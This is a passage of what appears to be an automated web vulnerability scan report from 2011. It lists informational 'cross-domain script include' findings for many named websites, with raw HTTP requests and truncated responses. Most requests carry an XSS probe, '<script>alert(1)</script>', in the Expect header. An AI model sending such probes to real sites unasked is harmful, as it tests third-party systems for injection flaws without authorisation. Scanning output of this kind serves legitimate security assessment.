Set-Cookie: LM_USER_LANGUAGE_PREFERENCE=en; expires=Fri, 04-May-2012 01:27:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=32icitiwdl02j42xrguoyqzk; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <title>Hun
...[SNIP]...
</script>
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.31. http://www.inautix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inautix.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inautix.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Pershing LLC
Date: Wed, 04 May 2011 01:39:23 GMT
Set-Cookie: JSESSIONID=3D76E0F5DA1F23D742B618B8DC0EF710; Path=/cps
Set-Cookie: RedDotLiveServerSessionID_inautix=SID-7997F859-ED5AF4F9; Path=/
MASTERWEBLET: CACHED
Expires: Wed, 04 May 2011 01:36:00 GMT
Date: Wed, 04 May 2011 01:36:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 13484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 1952 - published
...[SNIP]...
</script>
<script src="//s7.addthis.com/static/r07/menu54.js"></script>
...[SNIP]...

22.32. http://www.kontrolfreek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kontrolfreek.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kontrolfreek.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18615
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQABRACT=JCJFOKFAOAJNIGBNOEGNJGBI; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:13:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Xbox 360 & PS3
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js"></script>
...[SNIP]...
<!-- Monitor tag for Account ShopVisible (ID: 2), Site KontrolFreek (ID: 49), Queue Sales (ID: 98) -->
   <script language=javascript src="https://www.shopvisible.net/SightMaxAgentInterface/Monitor.smjs?accountID=2&siteID=49&queueID=98"></script>
...[SNIP]...

22.33. http://www.linkchina.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkchina.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.linkchina.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 /favicon.ico
Server: nginx/0.7.14
Date: Wed, 04 May 2011 03:07:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=CC8AC59D1031016BC6722B6D9B801B12; Path=/
Content-Length: 36362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="pr
...[SNIP]...
</script><script src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<div id="footer_verisign"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.linkchina.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

22.34. http://www.livewellhd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewellhd.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livewellhd.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:42:29 GMT
Content-Length: 10039
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abclow01
X-Powered-By: ASP.NET


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


   <titl
...[SNIP]...
<link rel="home" type="text/html" title="" href="http://www.livewellnetwork.com/index" />

       <script type="text/javascript" src="http://cdn.abclocal.go.com/static/js2007/global.library.js"></script>
       <script type="text/javascript" src= "http://cdn.abclocal.go.com/static/lwhd/js/global.js"></script>
       <script type="text/javascript" src="http://livewellnetwork.com/shellExternal?type=404" language="javascript"></script>
...[SNIP]...

22.35. http://www.lol-jokes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lol-jokes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lol-jokes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:42:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Server: Apache/Nginx/Varnish
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=1e11cc5fdd7922098b1869d2ed387b53; expires=Fri, 27-May-2011 06:15:32 GMT; path=/
Last-Modified: Wed, 20 Oct 2010 09:54:46 GMT
ETag: "79111cf2abb5675b4c433e5f9a3e8460"
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 02:42:16 GMT
Vary: Accept-Encoding
Content-Length: 19390
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script><script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

22.36. http://www.marriottvacationclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marriottvacationclub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 10064
Content-Type: text/html
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8fd9; path=/; expires=Wed, 04 May 2011 01:08:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Marriott
...[SNIP]...
</script>
<script src="https://dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2&s=1" type="text/javascript">// </script>
...[SNIP]...

22.37. http://www.medicalcareersdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalcareersdirect.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medicalcareersdirect.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.7.67
Date: Wed, 04 May 2011 03:07:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Cookie,Accept-Encoding
Content-Length: 6178


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <title>Medi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/base.css" />
       <script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
       <script src="http://d3p25pim0tw5ni.cloudfront.net/medicalcareersdirect.com/javascript/cufon-yui.js" type="text/javascript" ></script>
       <script src="http://d3p25pim0tw5ni.cloudfront.net/medicalcareersdirect.com/javascript/droid.js" type="text/javascript" ></script>
       <script src="http://d3p25pim0tw5ni.cloudfront.net/medicalcareersdirect.com/javascript/pngFix.js" type="text/javascript" ></script>
       <script src="http://d3p25pim0tw5ni.cloudfront.net/medicalcareersdirect.com/javascript/swfobject.js"></script>
       <script src="http://d3p25pim0tw5ni.cloudfront.net/medicalcareersdirect.com/javascript/jquery.uniform.js" type="text/javascript" charset="utf-8"></script>
       <script src="http://d3p25pim0tw5ni.cloudfront.net/medicalcareersdirect.com/javascript/mcd.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.neutronstats.com/js/track.js"></script>
...[SNIP]...

22.38. http://www.moreplatformbeds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moreplatformbeds.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moreplatformbeds.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:10:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cyzmth55fd1nlbfgevj421fj; path=/; HttpOnly
Set-Cookie: VisitorID=2245573D; expires=Sun, 03-Jul-2011 03:10:28 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>The page cannot be found</title>
<meta http-equiv="Content-Languag
...[SNIP]...
</script>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.39. http://www.motorracingnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motorracingnetwork.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motorracingnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Last-Modified: Wed, 04 May 2011 03:23:21 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 29175
Vary: Accept-Encoding
Cache-Control: public, max-age=960
Expires: Wed, 04 May 2011 03:39:21 GMT
Date: Wed, 04 May 2011 03:23:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=iscinteractive&pub=iscinteractive"></script>
...[SNIP]...

22.40. http://www.mrclean.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrclean.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrclean.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:31:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 556

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
</p>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

22.41. http://www.mybusinesslisting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 4520
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=NBGAHBODDGBJJINKLJFCJOMG; path=/
Cache-control: private

<html>
<head>
<title>favicon.ico Listings (yellow page directory / yellow pages directory) Businesses Category Browsing</title>

<link rel="stylesheet" href="/_css/styles.css" type="text/css" />

...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
   </script>
...[SNIP]...

22.42. http://www.mylovedhair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedhair.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedhair.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 03:07:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8734
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 03:07:15 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Hair Pictures</title>
<!
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

22.43. http://www.mylovedtwinks.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedtwinks.tv
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedtwinks.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8768
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Wed, 04 May 2011 01:01:26 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Twinks Movies</title>
<!
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

22.44. http://www.naturalinsight.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.naturalinsight.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturalinsight.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13540
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<link rel="stylesheet" href="/includes/new-nav.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.js" type="text/javascript"></script>
...[SNIP]...

22.45. http://www.nobelcom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nobelcom.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nobelcom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache,max-age=1800
Set-Cookie: JSESSIONID=abcg2Sy5PoJdmaEx9I4_s; domain=.nobelcom.com; path=/
Content-Type: text/html
Date: Wed, 04 May 2011 01:07:42 GMT
Content-Length: 30526


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>


   <title>Phone Cards from NobelCom.com for domestic and international use</title>
   <meta name=
...[SNIP]...
<!-- js section -->
   <script type="text/javascript" src="http://a1423.g.akamai.net/7/1423/2872/119/nobelcom.com/nobelcom/js/imagerollovers.js"></script>
   <script type="text/javascript" src="http://a1423.g.akamai.net/7/1423/2872/119/nobelcom.com/nobelcom/js/loadurl.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://a1423.g.akamai.net/7/1423/2872/119/nobelcom.com/nobelcom/js/menu.js"></script>
   <script type="text/javascript" src="http://a1423.g.akamai.net/7/1423/2872/119/nobelcom.com/nobelcom/js/nobelcom.js"></script>
   <script type="text/javascript" src="http://a1423.g.akamai.net/7/1423/2872/119/nobelcom.com/nobelcom/js/AC_RunActiveContent.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://a1423.g.akamai.net/7/1423/2872/112/nobelcom.com/nobelcom/js/rolovertip.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
   </script>
...[SNIP]...
<select name="from_country" class="dropdownsearch">
       
       <script type="text/javascript" src="http://a1423.g.akamai.net/7/1423/2872/119/nobelcom.com/nobelcom/js/callingfrom_2.js"></script>
...[SNIP]...
<select name="to_country" class="dropdownsearch">
       
       <script type="text/javascript" src="http://a1423.g.akamai.net/7/1423/2872/119/nobelcom.com/nobelcom/js/callingto_2.js"></script>
...[SNIP]...
<td width="150" align="center" valign="top">
                   <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.nobelcom.com&amp;size=L&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

22.46. http://www.plantdelights.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plantdelights.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.plantdelights.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:14:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 42258
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSADCASDB=FOKNBCODECJECPPBIEPGHIJG; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

   <base href="http://www.plantdelights
...[SNIP]...
<link rel="stylesheet" href="nivo-slider/nivo-slider.css" type="text/css" media="screen" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

22.47. http://www.populartag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.populartag.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.populartag.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:19:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Vary: Cookie
X-Pingback: http://www.populartag.com/xmlrpc.php
Set-Cookie: wwsgd_visits=1; expires=Thu, 03-May-2012 00:19:22 GMT; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:19:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 8809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<!--Start Adultadworld.com GEOPop excluding Countries: --><script type="text/javascript" src="http://cluster.adultadworld.com/geopop/geoinject.js"></script>
...[SNIP]...

22.48. http://www.quantumjumping.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/ HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmx_k_180318845=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:53 GMT; path=/; domain=.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 113180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
   <head profile="http:/
...[SNIP]...
<div class="textwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

22.49. http://www.quantumjumping.com/blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/wp-content/plugins/MV-headway-bug-cure/MV-sticky-footer.css?ver=1 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: oemail=deleted; expires=Tue, 04-May-2010 00:53:58 GMT; path=/; domain=.quantumjumping.com
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:59 GMT; path=/; domain=www.quantumjumping.com
X-Pingback: http://www.quantumjumping.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 00:53:59 GMT
